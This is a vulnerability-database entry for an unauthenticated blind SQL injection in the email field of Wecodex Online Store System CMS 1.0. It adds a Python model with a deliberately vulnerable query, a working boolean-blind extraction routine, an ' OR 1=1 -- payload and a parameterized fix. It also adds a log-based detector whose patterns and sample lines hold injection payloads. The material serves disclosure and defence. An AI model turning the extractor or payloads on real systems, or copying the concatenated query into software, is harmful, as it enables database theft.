Description
Online Store System CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the email parameter. Attackers can send POST requests to index.php with the action=clientaccess parameter using boolean-based blind or time-based blind SQL injection payloads in the email field to extract sensitive database information.
Published: 2026-03-26
Score: 8.8 High
EPSS: < 1% Very Low
KEV: No
Impact: Information Disclosure
Action: Immediate Patch
AI Analysis

Impact

A flaw in the Online Store System CMS allows unauthenticated attackers to inject SQL code through the email parameter of the clientaccess action. By sending crafted POST requests to index.php with action=clientaccess, an attacker can perform boolean-based or time-based blind SQL injection and extract sensitive database information. Because the injection is blind, data is recovered a bit at a time from observable differences in the response (boolean-based) or from induced delays (time-based), which makes exploitation noisy but fully automatable. No user privileges are required, and the endpoint can be reached from any host able to talk to the web server.
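The following Python model is added here as an illustration; it is not code from Online Store System CMS or from OpenCVE. It shows why a boolean-based blind injection in an email lookup discloses data that the query was never meant to return, and how a bound parameter closes the hole. The `clients` table, its columns, the concatenated query text and the sample rows are assumptions chosen to mirror the described flaw, with an in-memory SQLite database standing in for the CMS database. A time-based variant substitutes a delay function for the row/no-row difference and is not modelled here because SQLite has no sleep function.

```python
"""Blind SQL injection model for an email lookup, with the parameterized fix.
Added illustration only: table, columns and query text are assumptions, not
code from Online Store System CMS."""
import sqlite3

# Constructed sample rows standing in for the CMS client table (assumption).
SAMPLE_CLIENTS = [
    ("alice@example.com", "s3cr3t-alice"),
    ("bob@example.com", "s3cr3t-bob"),
]


def build_db():
    """In-memory SQLite database playing the role of the CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO clients VALUES (?, ?)", SAMPLE_CLIENTS)
    return conn


def client_access_vulnerable(conn, email):
    """Hypothetical vulnerable handler: the email is spliced into the SQL text,
    so a quote in the input changes the query.  Returns whether any row
    matched; that single bit is all a boolean-based blind attacker needs."""
    sql = "SELECT 1 FROM clients WHERE email = '" + email + "'"
    return conn.execute(sql).fetchone() is not None


def client_access_fixed(conn, email):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    sql = "SELECT 1 FROM clients WHERE email = ?"
    return conn.execute(sql, (email,)).fetchone() is not None


def boolean_blind_extract(oracle, target_subquery, max_len=32):
    """Recover the string selected by `target_subquery` one character at a time
    using only a true/false oracle.  oracle(payload) must return whether the
    injected condition held.  Each character costs about 7 requests (bisection
    over the 7-bit range); attack tools do exactly this at scale."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Injected condition on one character of the target value.
            cond = f"unicode(substr(({target_subquery}),{pos},1)) > {mid}"
            # Close the quote, OR in the condition, comment out the rest.
            if oracle(f"' OR {cond} --"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end yields '', unicode('') is NULL and the
            # comparison is never true: the whole string has been read.
            break
        result += chr(lo)
    return result


def demo():
    """Extract alice's stored password through the vulnerable handler."""
    conn = build_db()
    target = "SELECT password FROM clients WHERE email = 'alice@example.com'"
    return boolean_blind_extract(lambda p: client_access_vulnerable(conn, p), target)


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable, payload ' OR 1=1 --:", client_access_vulnerable(conn, "' OR 1=1 --"))
    print("fixed, same payload:", client_access_fixed(conn, "' OR 1=1 --"))
    print("extracted via blind oracle:", demo())
```

Against the vulnerable handler the tautology payload returns a match and `demo()` recovers the full stored value without ever seeing a row in the response; against the parameterized handler the same payload is simply an email address that matches nothing.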

Affected Systems

The vulnerability affects Online Store System CMS 1.0 developed by Wecodex. The affected code path is the clientaccess action of index.php, which reads the email field from the POST body. No other versions are listed as affected.

Risk and Exploitability

The CVSS v4.0 base score of 8.8 (CVSS v3.1: 8.2) reflects network-reachable, low-complexity exploitation with no privileges or user interaction; the vector records high confidentiality impact and low integrity impact, so the primary outcome is disclosure of database contents. The EPSS score below 1% is an estimate of a low probability of exploitation in the wild over the coming 30 days, not a statement about difficulty, and the vulnerability is not listed in the CISA KEV catalog. The SSVC assessment recorded in the history marks exploitation as 'poc' and the attack as automatable. An attacker needs only the ability to send a crafted HTTP POST request to the vulnerable endpoint over the network; no credentials or internal access are required.

Generated by OpenCVE AI on March 26, 2026 at 14:09 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Contact Wecodex to obtain an updated version of Online Store System CMS that removes the SQL injection flaw, or apply a vendor-supplied patch if one becomes available.
  • If no patch is available, restrict external access to index.php or to the clientaccess action, for example with IP allow-listing or firewall rules, since the endpoint is reachable without authentication.
  • Fix the query in the clientaccess handler to use parameterized queries (prepared statements) for the email value; validating the email format is a useful additional layer but not a substitute.
  • Log and monitor POST requests to index.php with action=clientaccess, looking for SQL metacharacters in the email value, abnormally slow responses (time-based blind), and bursts of many distinct email values from one source, to detect exploitation attempts.
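Added example of the monitoring step (not OpenCVE or vendor code): a few detection heuristics run over constructed request-log lines. The JSON-per-line log format, the field names, the thresholds and the sample IPs and values are all assumptions; in particular the code presumes an application-level or reverse-proxy log that records POST parameters and response time, since ordinary web server access logs omit POST bodies. Three signals are checked: SQL metacharacters or delay functions in the email value, abnormally slow responses (the signature of time-based blind injection), and bursts of many distinct email values from one source, which any blind technique produces because it needs several requests per extracted character.

```python
"""Detection heuristics for blind SQL injection attempts against
POST /index.php?action=clientaccess.  Added illustration, not OpenCVE or
vendor code; the log format, thresholds and sample values are assumptions."""
import json
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample request-log lines (assumed JSON-per-line format that
# records POST parameters and response time; ordinary access logs do not).
SAMPLE_LOG = """\
{"ts":"2026-03-26T14:00:00Z","ip":"203.0.113.5","method":"POST","path":"/index.php","params":{"action":"clientaccess","email":"alice@example.com"},"rt_ms":12}
{"ts":"2026-03-26T14:00:01Z","ip":"198.51.100.7","method":"POST","path":"/index.php","params":{"action":"clientaccess","email":"x' AND 1=1-- "},"rt_ms":11}
{"ts":"2026-03-26T14:00:01Z","ip":"198.51.100.7","method":"POST","path":"/index.php","params":{"action":"clientaccess","email":"x' AND 1=2-- "},"rt_ms":10}
{"ts":"2026-03-26T14:00:02Z","ip":"198.51.100.9","method":"POST","path":"/index.php","params":{"action":"clientaccess","email":"x' AND SLEEP(5)-- "},"rt_ms":5014}
{"ts":"2026-03-26T14:00:03Z","ip":"203.0.113.5","method":"POST","path":"/index.php","params":{"action":"clientaccess","email":"bob@example.com"},"rt_ms":9}
"""

# Quotes, statement separators, comment openers, boolean shapes, delay functions.
SQLI_META = re.compile(
    r"['\"`;]|--|/\*|\b(?:and|or)\b.*?=|\b(?:sleep|benchmark|pg_sleep|waitfor)\b",
    re.I,
)
SLOW_MS = 3000        # assumption: far above a normal lookup time
BURST_WINDOW_S = 60   # assumption
BURST_COUNT = 30      # blind extraction needs several requests per character


def make_burst(ip="198.51.100.11", n=35):
    """Constructed burst: n distinct, individually benign-looking emails from
    one source within n seconds, the shape of automated blind extraction."""
    lines = []
    for i in range(n):
        lines.append(json.dumps({
            "ts": f"2026-03-26T14:01:{i:02d}Z", "ip": ip, "method": "POST",
            "path": "/index.php",
            "params": {"action": "clientaccess", "email": f"probe{i}@example.com"},
            "rt_ms": 10,
        }))
    return "\n".join(lines) + "\n"


def parse_log(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            e = json.loads(line)
            e["ts"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
            events.append(e)
    return events


def is_clientaccess(e):
    return (e.get("method") == "POST" and e.get("path") == "/index.php"
            and e.get("params", {}).get("action") == "clientaccess")


def detect(events):
    """Return findings as (ip, reason, email) tuples."""
    findings = []
    per_ip = defaultdict(list)
    for e in events:
        if not is_clientaccess(e):
            continue
        email = str(e["params"].get("email", ""))
        if SQLI_META.search(email):
            findings.append((e["ip"], "sqli-pattern", email))
        if e.get("rt_ms", 0) >= SLOW_MS:
            findings.append((e["ip"], "slow-response", email))
        per_ip[e["ip"]].append(e)
    # Burst rule: sliding window per source over sorted timestamps, counting
    # distinct email values so a customer retrying one login does not fire.
    for ip, evs in per_ip.items():
        evs.sort(key=lambda x: x["ts"])
        start = 0
        for end in range(len(evs)):
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > BURST_WINDOW_S:
                start += 1
            window = evs[start:end + 1]
            distinct = {str(w["params"].get("email", "")) for w in window}
            if len(window) >= BURST_COUNT and len(distinct) >= BURST_COUNT:
                findings.append((ip, "burst", None))
                break
    return findings


def demo():
    return detect(parse_log(SAMPLE_LOG + make_burst()))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The pattern rule catches the obvious payloads; the slow-response and burst rules are what remain once an attacker encodes or obfuscates the injected text, which is why the three are checked together.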


Advisories

No advisories yet.

History

Fri, 27 Mar 2026 08:45:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Wecodex
                                       Wecodex online Store System Cms
Vendors & Products                     Wecodex
                                       Wecodex online Store System Cms

Thu, 26 Mar 2026 15:15:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc
                           {'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 26 Mar 2026 12:00:00 +0000

Type          Values Removed   Values Added
Description                    Online Store System CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the email parameter. Attackers can send POST requests to index.php with the action=clientaccess parameter using boolean-based blind or time-based blind SQL injection payloads in the email field to extract sensitive database information.
Title                          Online Store System CMS 1.0 SQL Injection via clientaccess
Weaknesses                     CWE-89
References
Metrics                        cvssV3_1
                               {'score': 8.2, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}
                               cvssV4_0
                               {'score': 8.8, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-03-26T15:02:07.192Z

Reserved: 2026-03-26T11:33:01.646Z

Link: CVE-2018-25203

Vulnrichment

Updated: 2026-03-26T13:44:43.611Z

NVD

Status : Awaiting Analysis

Published: 2026-03-26T12:16:05.047

Modified: 2026-03-26T15:13:15.790

Link: CVE-2018-25203

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-27T09:28:43Z

Weaknesses